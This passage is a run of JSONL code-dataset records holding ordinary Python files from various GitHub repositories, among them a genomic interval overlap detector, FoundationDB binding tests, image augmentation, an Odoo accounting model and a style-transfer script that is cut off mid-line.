                                \"allowed.\")\n        operation_info_offset = _LOC_OPERAND_TYPE\n\n        for k in range(0, self.__no_opr, 1):\n            # parse operand type\n            opr_type = int(self.__raw_server_data[\n                           operation_info_offset:\n                           operation_info_offset + _LEN_OPERAND_TYPE\n                           ],\n                           16)\n            operation_info_offset += _LEN_OPERAND_TYPE\n\n            # parse operand id\n            opr_id = int(self.__raw_server_data[\n                         operation_info_offset:\n                         operation_info_offset + _LEN_OPERAND_ID\n                         ],\n                         16)\n            operation_info_offset += _LEN_OPERAND_ID\n\n            # parse operand instruction\n            instruction = int(self.__raw_server_data[\n                              operation_info_offset:\n                              operation_info_offset + _LEN_OPERAND_INSTRUCTION\n                              ],\n                              16)\n            operation_info_offset += _LEN_OPERAND_INSTRUCTION\n\n            self.__operation_info.append((opr_type, opr_id, instruction))\n\n    \" Get the next operand information \"\n    def next_operand_info(self):\n        self.__opr_ctr += 1\n        if self.__opr_ctr < self.__no_opr:\n            return self.__operation_info[self.__opr_ctr]\n        return None\n\n    def has_next(self):\n        return self.__opr_ctr < (self.__no_opr - 1)\n\n    \" Reset everything counter \"\n    def reset(self):\n        self.__opr_ctr = -1\n","repo_name":"Redcof/IOTPSlave","sub_path":"IOTPSlaveCore/IOTPTransactionTypeCommand.py","file_name":"IOTPTransactionTypeCommand.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11899931805","text":"from fastapi import APIRouter, File, UploadFile\nfrom common import Injects\nfrom services.music import MusicService\nfrom starlette.responses import StreamingResponse\nimport io\nimport numpy as np\nfrom PIL import Image\n\n# NOTE: model_u2net, model_u2netp and detect are assumed to be provided elsewhere in the project.\ndef remove(data, model_name=\"u2net\"):\n    model = model_u2net\n\n    if model_name == \"u2netp\":\n        model = model_u2netp\n\n    img = Image.open(io.BytesIO(data))\n    roi = detect.predict(model, 
np.array(img))\n    roi = roi.resize((img.size), resample=Image.LANCZOS)\n\n    empty = Image.new(\"RGBA\", (img.size), 0)\n    out = Image.composite(img, empty, roi.convert(\"L\"))\n\n    bio = io.BytesIO()\n    out.save(bio, \"PNG\")\n\n    return bio.getbuffer()\n\n\n\nrouter = APIRouter()\n\n@router.get(\"/api/music\")\nasync def root(music_service: MusicService = Injects(MusicService)):\n    return {\"message\": music_service.process()}\n\n\n@router.post(\"/api/files\")\nasync def create_file(file: bytes = File(...)):\n    return {\"file_size\": len(file)}\n\n\n@router.post(\"/api/music/{file_name}\")\nasync def create_upload_file(file_name, file: UploadFile = File(...), music_service: MusicService = Injects(MusicService)):\n    print(file)\n    print(file_name)\n    print(file.filename)\n    file_data=await file.read()\n    file_processed=music_service.process(file_data)\n    #with open('/tmp/tmp_fbc6ony.zip','rb') as f:\n    #    file_processed=f.read()\n    return StreamingResponse(io.BytesIO(file_processed), media_type=\"application/x-zip-compressed\")\n","repo_name":"qooba/aimusicseparation","sub_path":"src/app/routers/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10133720854","text":"from machine import Pin\n\n# MQTT broker IP\nMQTT_SERVER = '10.0.1.250'\n#MQTT_SERVER = '192.168.1.143'\n\n# MQTT client config\nMQTT_CLIENT_ID = 'Weather_TV1'\nMQTT_TOPIC = 'sensornet/env/+/status'\nMQTT_TOPIC_PREFIX = 'sensornet/' + MQTT_CLIENT_ID + '/'\n\nKEY1 = Pin(35)\n\nN_LED = 0\n\nPWR_ON = 2\nOLED_PWR = 33\nTOUCH=15\nTOUCH_PWR=32\nBATT_LVL=34\n\nBAUD=27000000\nSCK=18\nMOSI=23\nMISO=32\nDC=19\nRST=4\nCS=5\n\nDISPLAY_WIDTH=128\nDISPLAY_HEIGHT=64\n\nSTYLE=1\nLANG='sv'","repo_name":"edwios/dotIoT","sub_path":"ESP32_LilyGo/WeatherInfoTV/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18950962424","text":"a = input(\"Number1: \")\r\nb = input(\"Number2: \")\r\n\r\ndef add():\r\n    result1 = int(a) + int(b)\r\n    return result1\r\n\r\ndef sub():\r\n    result2 = int(a) - int(b)\r\n    return result2\r\n\r\ndef mul():\r\n    result3 = int(a) * int(b)\r\n    return result3\r\n\r\ndef div():\r\n    result4 = int(a) / int(b)\r\n    return result4\r\n\r\nvar1 = add()\r\nvar2 = sub()\r\nvar3 = mul()\r\nvar4 = div()\r\n\r\nprint(\"Addition=\",var1)\r\nprint(\"Subtraction=\",var2)\r\nprint(\"Multiplication=\",var3)\r\nprint(\"Division=\",var4)","repo_name":"Nilven17/Python","sub_path":"Funtion with return.py","file_name":"Funtion with return.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29599332801","text":"\"\"\"\nUtility Classes for Querying Overlaps with Genomic Regions\n----------------------------------------------------------\n\nExamples of Detecting Overlaps\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n.. 
code-block:: python\n\n >>> from pybedlite.overlap_detector import Interval, OverlapDetector\n >>> detector = OverlapDetector()\n >>> query = Interval(\"chr1\", 2, 20)\n >>> detector.overlaps_any(query)\n False\n >>> detector.add(Interval(\"chr2\", 1, 100))\n >>> detector.add(Interval(\"chr1\", 21, 100))\n >>> detector.overlaps_any(query)\n False\n >>> detector.add(Interval(\"chr1\", 1, 1))\n >>> detector.overlaps_any(query)\n True\n >>> detector.get_overlaps(query)\n [Interval(\"chr1\", 1, 1)]\n >>> detector.add(Interval(\"chr1\", 3, 10))\n >>> detector.overlaps_any(query)\n True\n >>> detector.get_overlaps(query)\n [Interval(\"chr1\", 1, 1), interval(\"chr1\", 3, 10)]\n\nModule Contents\n~~~~~~~~~~~~~~~\n\nThe module contains the following public classes:\n\n - :class:`~pybedlite.overlap_detector.Interval` -- Represents a region mapping to the genome\n that is 0-based and open-ended\n - :class:`~pybedlite.overlap_detector.OverlapDetector` -- Detects and returns overlaps between\n a set of genomic regions and another genomic region\n\"\"\"\n\nimport itertools\nfrom pathlib import Path\nfrom typing import Dict\nfrom typing import Iterable\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\n\nimport attr\nimport cgranges as cr\n\nfrom pybedlite.bed_record import BedStrand\nfrom pybedlite.bed_source import BedSource\n\n\n@attr.s(frozen=True, auto_attribs=True)\nclass Interval:\n \"\"\"A region mapping to the genome that is 0-based and open-ended\n\n Attributes:\n refname (str): the refname (or chromosome)\n start (int): the 0-based start position\n end (int): the 0-based end position (exclusive)\n negative (bool): true if the interval is on the negative strand, false otherwise\n name (Optional[str]): an optional name assigned to the interval\n \"\"\"\n\n refname: str = attr.ib()\n start: int = attr.ib()\n end: int = attr.ib()\n negative: bool = False\n name: Optional[str] = None\n\n def __attrs_post_init__(self) -> None:\n \"\"\"Performs simple validation.\n\n Checks:\n - 0 <= start\n - start < end\n \"\"\"\n if self.start < 0:\n raise ValueError(f\"start is out of range: {self.start}\")\n if self.end <= self.start:\n raise ValueError(f\"end <= start: {self.end} <= {self.start}\")\n\n def overlap(self, other: \"Interval\") -> int:\n \"\"\"Returns the overlap between this interval and the other, or zero if there is none.\n\n Args:\n other (Interval): the other interval to find the overlap with\n \"\"\"\n if self.refname != other.refname:\n return 0\n\n overlap = min(self.end, other.end) - max(self.start, other.start)\n return overlap if overlap > 0 else 0\n\n def length(self) -> int:\n \"\"\"Returns the length of the interval.\"\"\"\n return self.end - self.start\n\n\nclass OverlapDetector(Iterable[Interval]):\n \"\"\"Detects and returns overlaps between a set of genomic regions and another genomic region.\n\n Since :class:`~samwell.overlap_detector.Interval` objects are used both to populate the\n overlap detector and to query it, the coordinate system in use is also 0-based open-ended.\n\n The same interval may be added multiple times, but only a single instance will be returned\n when querying for overlaps. 
Intervals with the same coordinates but different names are\n treated as different intervals.\n\n This detector is the most efficient when all intervals are added ahead of time.\n \"\"\"\n\n def __init__(self) -> None:\n # A mapping from the contig/chromosome name to the associated interval tree\n self._refname_to_tree: Dict[str, cr.cgranges] = {} # type: ignore\n self._refname_to_indexed: Dict[str, bool] = {}\n self._refname_to_intervals: Dict[str, List[Interval]] = {}\n\n def __iter__(self) -> Iterator[Interval]:\n \"\"\"Iterates over the intervals in the overlap detector.\"\"\"\n return itertools.chain(*self._refname_to_intervals.values())\n\n def add(self, interval: Interval) -> None:\n \"\"\"Adds an interval to this detector.\n\n Args:\n interval: the interval to add to this detector\n \"\"\"\n refname = interval.refname\n if refname not in self._refname_to_tree:\n self._refname_to_tree[refname] = cr.cgranges() # type: ignore\n self._refname_to_indexed[refname] = False\n self._refname_to_intervals[refname] = []\n\n # Append the interval to the list of intervals for this tree, keeping the index\n # of where it was inserted\n interval_idx: int = len(self._refname_to_intervals[refname])\n self._refname_to_intervals[refname].append(interval)\n\n # Add the interval to the tree\n tree = self._refname_to_tree[refname]\n tree.add(interval.refname, interval.start, interval.end, interval_idx)\n\n # Flag this tree as needing to be indexed after adding a new interval, but defer\n # indexing\n self._refname_to_indexed[refname] = False\n\n def add_all(self, intervals: Iterable[Interval]) -> None:\n \"\"\"Adds one or more intervals to this detector.\n\n Args:\n intervals: the intervals to add to this detector\n \"\"\"\n for interval in intervals:\n self.add(interval)\n\n def overlaps_any(self, interval: Interval) -> bool:\n \"\"\"Determines whether the given interval overlaps any interval in this detector.\n\n Args:\n interval: the interval to check\n\n Returns:\n True if and only if the given interval overlaps with any interval in this\n detector.\n \"\"\"\n tree = self._refname_to_tree.get(interval.refname)\n if tree is None:\n return False\n else:\n if not self._refname_to_indexed[interval.refname]:\n tree.index()\n try:\n next(iter(tree.overlap(interval.refname, interval.start, interval.end)))\n except StopIteration:\n return False\n else:\n return True\n\n def get_overlaps(self, interval: Interval) -> List[Interval]:\n \"\"\"Returns any intervals in this detector that overlap the given interval.\n\n Args:\n interval: the interval to check\n\n Returns:\n The list of intervals in this detector that overlap the given interval, or the empty\n list if no overlaps exist. The intervals will be return in ascending genomic order.\n \"\"\"\n tree = self._refname_to_tree.get(interval.refname)\n if tree is None:\n return []\n else:\n if not self._refname_to_indexed[interval.refname]:\n tree.index()\n ref_intervals: List[Interval] = self._refname_to_intervals[interval.refname]\n # NB: only return unique instances of intervals\n intervals: Set[Interval] = {\n ref_intervals[index]\n for _, _, index in tree.overlap(interval.refname, interval.start, interval.end)\n }\n return sorted(\n intervals, key=lambda intv: (intv.start, intv.end, intv.negative, intv.name)\n )\n\n def get_enclosing_intervals(self, interval: Interval) -> List[Interval]:\n \"\"\"Returns the set of intervals in this detector that wholly enclose the query interval.\n i.e. 
query.start >= target.start and query.end <= target.end.\n\n Args:\n interval: the query interval\n Returns:\n The list of intervals in this detector that enclose the query interval.\n The intervals will be returned in ascending genomic order.\n \"\"\"\n results = self.get_overlaps(interval)\n return [i for i in results if interval.start >= i.start and interval.end <= i.end]\n\n def get_enclosed(self, interval: Interval) -> List[Interval]:\n \"\"\"Returns the set of intervals in this detector that are enclosed by the query\n interval. I.e. target.start >= query.start and target.end <= query.end.\n\n Args:\n interval: the query interval\n\n Returns:\n The list of intervals in this detector that are enclosed within the query interval.\n The intervals will be return in ascending genomic order.\n \"\"\"\n results = self.get_overlaps(interval)\n return [i for i in results if i.start >= interval.start and i.end <= interval.end]\n\n @classmethod\n def from_bed(cls, path: Path) -> \"OverlapDetector\":\n \"\"\"Builds an :class:`~samwell.overlap_detector.OverlapDetector` from a BED file.\n Args:\n path: the path to the BED file\n Returns:\n An overlap detector for the regions in the BED file.\n \"\"\"\n detector = OverlapDetector()\n for region in BedSource(path):\n locatable = Interval(\n refname=region.chrom,\n start=region.start,\n end=region.end,\n negative=region.strand == BedStrand.Negative,\n name=region.name,\n )\n detector.add(locatable)\n return detector\n","repo_name":"fulcrumgenomics/pybedlite","sub_path":"pybedlite/overlap_detector.py","file_name":"overlap_detector.py","file_ext":"py","file_size_in_byte":9413,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"51"} +{"seq_id":"30295136389","text":"import os\nimport cv2\nimport numpy as np\n\ndef augment_images(input_folder, output_folder):\n\n os.makedirs(output_folder, exist_ok=True)\n\n for picName in os.listdir(input_folder):\n if not picName.endswith('.jpg'):\n continue \n\n pic_dir = os.path.join(input_folder, picName)\n pic = cv2.imread(pic_dir)\n\n augmentedPics = []\n\n #Brightness\n augmentedPics.append(cv2.convertScaleAbs(pic, alpha=1.2, beta=10)) #Brightness +\n augmentedPics.append(cv2.convertScaleAbs(pic, alpha=0.8, beta=10)) #Brightness -\n\n #Saturation\n hsv_image = cv2.cvtColor(pic, cv2.COLOR_BGR2HSV)\n hsv_image[:, :, 1] = np.clip(hsv_image[:, :, 1] * 1.5, 0, 255) #Sat+\n hsv_image[:, :, 2] = np.clip(hsv_image[:, :, 2] * 0.7, 0, 255) #Sat-\n augmentedPics.append(cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR))\n\n #Zoom\n height, width = pic.shape[:2]\n ZoomRation = 0.8\n Zoomed = cv2.resize(pic, (int(width * ZoomRation), int(height * ZoomRation)))\n augmentedPics.append(Zoomed)\n\n #Save pic\n name = os.path.splitext(picName)[0]\n for i, augmented in enumerate(augmentedPics):\n picName = f\"{name}_augmented_{i+1}.jpg\"\n picOut_dir = os.path.join(output_folder, picName)\n cv2.imwrite(picOut_dir, augmented)\n\n print(f\"Save za {picName}\")\n\n\n\n#augment_images(\"Data-validation/Up\", \"Augmented-validation/Up\")\n#augment_images(\"Data-validation/Left\", \"Augmented-validation/Left\")\n#augment_images(\"Data-validation/Right\", \"Augmented-validation/Right\")\naugment_images(\"Data-validation/Novo\", \"Augmented-validation/NovoRight\")\n","repo_name":"David-Sajina/NMDU","sub_path":"augmentation.py","file_name":"augmentation.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} 
+{"seq_id":"40478992190","text":"from openerp.exceptions import except_orm\nfrom openerp import fields, models, api\n\nclass other_money_order(models.Model):\n _name = 'other.money.order'\n _description = u'其他收入/其他支出'\n\n TYPE_SELECTION = [\n ('other_pay', u'其他收入'),\n ('other_get', u'其他支出'),\n ]\n\n @api.model\n def create(self, values):\n # 创建单据时,更新订单类型的不同,生成不同的单据编号\n if self._context.get('type') == 'other_get':\n values.update({'name': self.env['ir.sequence'].get('other.get.order') or '/'})\n if self._context.get('type') == 'other_pay' or values.get('name', '/') == '/':\n values.update({'name': self.env['ir.sequence'].get('other.pay.order') or '/'})\n\n return super(other_money_order, self).create(values)\n\n @api.one\n @api.depends('line_ids.amount')\n def _compute_total_amount(self):\n # 计算应付金额/应收金额\n self.total_amount = sum(line.amount for line in self.line_ids)\n\n state = fields.Selection([\n ('draft', u'未审核'),\n ('done', u'已审核'),\n ], string=u'状态', readonly=True, default='draft', copy=False)\n partner_id = fields.Many2one('partner', string=u'往来单位', readonly=True, states={'draft': [('readonly', False)]})\n date = fields.Date(string=u'单据日期', default=lambda self: fields.Date.context_today(self), readonly=True, states={'draft': [('readonly', False)]})\n name = fields.Char(string=u'单据编号', copy=False, readonly=True, default='/')\n total_amount = fields.Float(string=u'金额', compute='_compute_total_amount', store=True, readonly=True)\n bank_id = fields.Many2one('bank.account', string=u'结算账户',required=True, readonly=True, states={'draft': [('readonly', False)]})\n line_ids = fields.One2many('other.money.order.line', 'other_money_id', string=u'收支单行', readonly=True, states={'draft': [('readonly', False)]})\n type = fields.Selection(TYPE_SELECTION, string=u'类型', default=lambda self: self._context.get('type'), readonly=True, states={'draft': [('readonly', False)]})\n\n @api.onchange('partner_id')\n def _onchange_partner(self):\n '''\n 根据所选业务伙伴源单填充行\n '''\n self.line_ids = []\n lines = []\n for invoice in self.env['money.invoice'].search([('partner_id','=',self.partner_id.id),('to_reconcile','>',0)]):\n lines.append((0,0,{\n 'category_id':invoice.category_id.id,\n 'source_id':invoice.id,\n 'amount':invoice.to_reconcile,\n }))\n self.line_ids = lines\n\n @api.multi\n def other_money_done(self):\n '''其他收支单的审核按钮'''\n for other in self:\n if other.total_amount <= 0:\n raise except_orm(u'错误', u'金额应该大于0')\n for line in other.line_ids:\n # 针对源单付款,则更新源单和供应商应付\n if line.source_id:\n if line.amount > line.source_id.to_reconcile:\n raise except_orm(u'错误', u'核销金额大于源单未核销金额')\n else:\n line.source_id.to_reconcile -= line.amount\n other.partner_id.payable -= line.amount\n # 根据单据类型更新账户余额\n if other.type == 'other_pay':\n other.bank_id.balance -= other.total_amount\n else:\n other.bank_id.balance += other.total_amount\n other.state = 'done'\n return True\n\n @api.multi\n def other_money_draft(self):\n '''其他收支单的反审核按钮'''\n for other in self:\n for line in other.line_ids:\n # 针对源单付款,则更新源单和供应商应付\n if line.source_id:\n line.source_id.to_reconcile += line.amount\n other.partner_id.payable += line.amount\n # 根据单据类型更新账户余额\n if other.type == 'other_pay':\n other.bank_id.balance += other.total_amount\n else:\n other.bank_id.balance -= other.total_amount\n other.state = 'draft'\n return True\n\n @api.multi\n def print_other_money_order(self):\n '''打印 其他收入/支出单'''\n assert len(self._ids) == 1, '一次执行只能有一个id'\n return self.env['report'].get_action('money.report_other_money_order')\n\nclass 
other_money_order_line(models.Model):\n _name = 'other.money.order.line'\n _description = u'其他收支单明细'\n\n other_money_id = fields.Many2one('other.money.order', string=u'其他收支')\n category_id = fields.Many2one('core.category', u'类别', domain=\"[('type', '=', context.get('type'))]\")\n source_id = fields.Many2one('money.invoice', string=u'源单')\n amount = fields.Float(string=u'金额')\n note = fields.Char(string=u'备注')\n","repo_name":"USI-SHRD/gooderp","sub_path":"addons/money/other_money_order.py","file_name":"other_money_order.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"51"} +{"seq_id":"17673597216","text":"import numpy as np\nimport cv2\n\nvid = cv2.VideoCapture(0)\nfaceCascade = cv2.CascadeClassifier('C:\\\\OpenCV\\\\OpenCV4.6.0G\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml')\neyeCascade = cv2.CascadeClassifier('C:\\\\OpenCV\\\\OpenCV4.6.0G\\\\data\\\\haarcascades\\\\haarcascade_eye.xml')\nmouthCascade = cv2.CascadeClassifier('C:\\\\OpenCV\\\\OpenCV4.6.0G\\\\data\\\\haarcascades\\\\haarcascade_smile.xml')\n\nwhile True:\n ret, frame = vid.read()\n faces = faceCascade.detectMultiScale(frame, scaleFactor=1.05, minNeighbors=5, minSize=(30,30), flags=cv2.CASCADE_SCALE_IMAGE)\n # Draw just the face\n if len(faces) > 0:\n x, y, w, h = faces[0]\n frame = frame[y:y+h, x:x+w]\n # Resize to original size\n frame = cv2.resize(frame, (640, 480))\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\nvid.release()\ncv2.destroyAllWindows()","repo_name":"artuppp/PythonOpenCVClassifiers","sub_path":"tiktok.py","file_name":"tiktok.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"69880658079","text":"import argparse\nimport os\nimport sys\nimport time\nimport traceback\nimport json\n\nimport fdb\n\nif __name__ == \"__main__\":\n fdb.api_version(fdb.LATEST_API_VERSION)\n\nfrom cancellation_timeout_tests import test_timeouts\nfrom cancellation_timeout_tests import test_db_timeouts\nfrom cancellation_timeout_tests import test_cancellation\nfrom cancellation_timeout_tests import test_retry_limits\nfrom cancellation_timeout_tests import test_db_retry_limits\nfrom cancellation_timeout_tests import test_combinations\n\nfrom size_limit_tests import test_size_limit_option, test_get_approximate_size\nfrom tenant_tests import test_tenants\n\nVERBOSE = False\n\n\ndef log(msg):\n if VERBOSE:\n print(msg, file=sys.stderr, flush=True)\n\n\ndef test_fdb_transactional_generator(db):\n try:\n\n @fdb.transactional\n def function_that_yields(tr):\n yield 0\n\n assert (\n fdb.get_api_version() < 630\n ), \"Pre-6.3, a decorator may wrap a function that yields\"\n except ValueError:\n assert (\n fdb.get_api_version() >= 630\n ), \"Post-6.3, a decorator should throw if wrapped function yields\"\n\n\ndef test_fdb_transactional_returns_generator(db):\n try:\n\n def function_that_yields(tr):\n yield 0\n\n @fdb.transactional\n def function_that_returns(tr):\n return function_that_yields(tr)\n\n function_that_returns()\n assert fdb.get_api_version() < 630, \"Pre-6.3, returning a generator is allowed\"\n except ValueError:\n assert (\n fdb.get_api_version() >= 630\n ), \"Post-6.3, returning a generator should throw\"\n\n\ndef test_db_options(db):\n db.options.set_location_cache_size(100001)\n db.options.set_max_watches(100001)\n db.options.set_datacenter_id(\"dc_id\")\n 
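# exercise the remaining database-level option setters in one pass\n 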
db.options.set_machine_id(\"machine_id\")\n db.options.set_snapshot_ryw_enable()\n db.options.set_snapshot_ryw_disable()\n db.options.set_transaction_logging_max_field_length(1000)\n db.options.set_transaction_timeout(100000)\n db.options.set_transaction_timeout(0)\n db.options.set_transaction_timeout(0)\n db.options.set_transaction_max_retry_delay(100)\n db.options.set_transaction_size_limit(100000)\n db.options.set_transaction_retry_limit(10)\n db.options.set_transaction_retry_limit(-1)\n db.options.set_transaction_causal_read_risky()\n db.options.set_transaction_include_port_in_address()\n\n\n@fdb.transactional\ndef test_options(tr):\n tr.options.set_priority_system_immediate()\n tr.options.set_priority_batch()\n tr.options.set_causal_read_risky()\n tr.options.set_causal_write_risky()\n tr.options.set_read_your_writes_disable()\n tr.options.set_read_system_keys()\n tr.options.set_access_system_keys()\n tr.options.set_transaction_logging_max_field_length(1000)\n tr.options.set_timeout(60 * 1000)\n tr.options.set_retry_limit(50)\n tr.options.set_max_retry_delay(100)\n tr.options.set_used_during_commit_protection_disable()\n tr.options.set_debug_transaction_identifier(\"my_transaction\")\n tr.options.set_log_transaction()\n tr.options.set_read_lock_aware()\n tr.options.set_lock_aware()\n tr.options.set_include_port_in_address()\n tr.get(b\"\\xff\").wait()\n\n\ndef check_watches(db, watches, expected):\n for i, watch in enumerate(watches):\n if watch.is_ready() or expected:\n try:\n watch.wait()\n if not expected:\n assert False, \"Watch %d is ready\" % i\n except fdb.FDBError as e:\n tr = db.create_transaction()\n tr.on_error(e).wait()\n return False\n\n return True\n\n\ndef test_watches(db):\n while True:\n db[b\"w0\"] = b\"0\"\n db[b\"w3\"] = b\"3\"\n\n watches = [None]\n\n @fdb.transactional\n def txn1(tr):\n watches[0] = tr.watch(b\"w0\")\n tr.set(b\"w0\", b\"0\")\n assert not watches[0].is_ready()\n\n txn1(db)\n\n watches.append(db.clear_and_watch(b\"w1\"))\n watches.append(db.set_and_watch(b\"w2\", b\"2\"))\n watches.append(db.get_and_watch(b\"w3\"))\n\n assert watches[3][0] == b\"3\"\n watches[3] = watches[3][1]\n\n time.sleep(1)\n\n if not check_watches(db, watches, False):\n continue\n\n del db[b\"w1\"]\n\n time.sleep(5)\n\n if not check_watches(db, watches, False):\n continue\n\n db[b\"w0\"] = b\"a\"\n db[b\"w1\"] = b\"b\"\n del db[b\"w2\"]\n db.bit_xor(b\"w3\", b\"\\xff\\xff\")\n\n if check_watches(db, watches, True):\n return\n\n\n@fdb.transactional\ndef test_locality(tr):\n tr.options.set_timeout(60 * 1000)\n tr.options.set_read_system_keys() # We do this because the last shard (for now, someday the last N shards) is in the /FF/ keyspace\n\n # This isn't strictly transactional, thought we expect it to be given the size of our database\n boundary_keys = list(fdb.locality.get_boundary_keys(tr, b\"\", b\"\\xff\\xff\")) + [\n b\"\\xff\\xff\"\n ]\n end_keys = [\n tr.get_key(fdb.KeySelector.last_less_than(k)) for k in boundary_keys[1:]\n ]\n\n start_addresses = [\n fdb.locality.get_addresses_for_key(tr, k) for k in boundary_keys[:-1]\n ]\n end_addresses = [fdb.locality.get_addresses_for_key(tr, k) for k in end_keys]\n\n if [set(s.wait()) for s in start_addresses] != [\n set(e.wait()) for e in end_addresses\n ]:\n raise Exception(\"Locality not internally consistent.\")\n\n\ndef test_predicates():\n assert fdb.predicates.is_retryable(fdb.FDBError(1020))\n assert not fdb.predicates.is_retryable(fdb.FDBError(10))\n\n\ndef test_get_client_status(db):\n @fdb.transactional\n def 
simple_txn(tr):\n tr.get_read_version().wait()\n\n # Execute a simple transaction\n # to make sure the database is initialized\n simple_txn(db)\n # Here we just check if a meaningful client report status is returned\n # Different report attributes and error cases are covered by C API tests\n status_str = db.get_client_status().wait()\n status = json.loads(status_str)\n assert \"Healthy\" in status\n assert status[\"Healthy\"]\n\n\ndef run_unit_tests(db):\n try:\n log(\"test_db_options\")\n test_db_options(db)\n log(\"test_options\")\n test_options(db)\n log(\"test_watches\")\n test_watches(db)\n log(\"test_cancellation\")\n test_cancellation(db)\n log(\"test_retry_limits\")\n test_retry_limits(db)\n log(\"test_db_retry_limits\")\n test_db_retry_limits(db)\n log(\"test_timeouts\")\n test_timeouts(db)\n log(\"test_db_timeouts\")\n test_db_timeouts(db)\n log(\"test_combinations\")\n test_combinations(db)\n log(\"test_locality\")\n test_locality(db)\n log(\"test_predicates\")\n test_predicates()\n log(\"test_size_limit_option\")\n test_size_limit_option(db)\n log(\"test_get_approximate_size\")\n test_get_approximate_size(db)\n log(\"test_get_client_status\")\n test_get_client_status(db)\n\n if fdb.get_api_version() >= 710:\n log(\"test_tenants\")\n test_tenants(db)\n\n except fdb.FDBError as e:\n print(\"Unit tests failed: %s\" % e.description)\n traceback.print_exc()\n\n raise Exception(\"Unit tests failed: %s\" % e.description)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"\n Unit tests for python FDB API.\n \"\"\",\n )\n parser.add_argument(\n \"--cluster-file\",\n \"-C\",\n help=\"FDB cluster file\",\n required=True,\n )\n parser.add_argument(\n \"--verbose\",\n \"-V\",\n help=\"Print diagnostic info\",\n action=\"store_true\",\n )\n args = parser.parse_args()\n if args.verbose:\n VERBOSE = True\n log(\"Opening database {}\".format(args.cluster_file))\n db = fdb.open(args.cluster_file)\n run_unit_tests(db)\n","repo_name":"apple/foundationdb","sub_path":"bindings/python/tests/unit_tests.py","file_name":"unit_tests.py","file_ext":"py","file_size_in_byte":7970,"program_lang":"python","lang":"en","doc_type":"code","stars":13381,"dataset":"github-code","pt":"51"} +{"seq_id":"19004116945","text":"class Codec:\n def encode(self, strs: [str]) -> str:\n \"\"\"Encodes a list of strings to a single string.\n \"\"\"\n string = \"\"\n for s in strs:\n s = s.replace(\"#\", \"##\")\n string += f\"{s} # \"\n return string\n\n def decode(self, s: str) -> [str]:\n \"\"\"Decodes a single string to a list of strings.\n \"\"\"\n strs = s.split(\" # \")\n for i in range(len(strs)):\n strs[i] = strs[i].replace(\"##\", \"#\")\n return strs[:-1]\n\n\n# Your Codec object will be instantiated and called as such:\n# codec = Codec()\n# codec.decode(codec.encode(strs))\n","repo_name":"Yong-Zhuang/Tutoring","sub_path":"Interview/Coding/String/encode-and-decode-strings.py","file_name":"encode-and-decode-strings.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73128990557","text":"class Stack:\n\n def __init__(self):\n self.st = [] \n self.tos = 0 \n\n def Push(self,x:int):\n self.tos += 1\n self.st.append(x)\n\n def Top(self):\n return self.st[self.tos-1]\n\n def Empty(self):\n if self.tos == 0:\n return 1 \n else:\n return 0 \n\n def Pop(self):\n if self.Empty() == 1:\n return \"underflow\"\n else:\n x = 
self.st.pop(self.tos-1)\n self.tos -= 1 \n return x\n\ndef main():\n stack = Stack() \n stack.Push(10)\n stack.Push(20) \n stack.Push(30)\n print(stack.Pop())\n print(stack.Top()) \n print(stack.Empty())\n print(stack.st)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"glunkad/Programming-and-Data-Structures","sub_path":"stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22587573498","text":"from torchvision import transforms\nimport torch\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nfrom data import mean, std, device, get_gram, get_image, denormalize_img\nfrom model import FeatureExtractor\n\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nimg_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n\nstyle_img = get_image('style.jpeg', img_transform)\ncontent_img = get_image('content.png', img_transform)\n\n#generated_img = nn.Parameter(torch.FloatTensor(content_img.size()))\ngenerated_img = content_img.clone()\ngenerated_img.requires_grad = True\n\n\n#train\noptimizer = torch.optim.Adam([generated_img], lr=0.003, betas=[0.5, 0.999])\nencoder = FeatureExtractor().to(device)\nencoder.eval()\n\ncontent_weight = 1\nstyle_weight = 100\n\nfor epoch in range(1):\n content_features = encoder(content_img)\n style_features = encoder(style_img)\n generated_features = encoder(generated_img)\n\n loss = nn.MSELoss()\n #content_loss = torch.mean((content_features[-1] - generated_features[-1])**2)\n content_loss = loss(content_features[-1], generated_features[-1])\n\n style_loss = 0\n\n for style_feature, generated_feature in zip(style_features, generated_features):\n gram_style = get_gram(style_feature)\n gram_generated = get_gram(generated_feature)\n\n style_loss += loss(gram_style, gram_generated)\n\n total_loss = style_weight * style_loss + content_weight * content_loss\n\n optimizer.zero_grad()\n total_loss.backward()\n optimizer.step()\n\n if epoch % 100 == 0:\n print(\"Epoch {} \\t content_loss: {:.5f}\\t style_loss: {:0.5f}\".format(epoch, content_loss.item(), 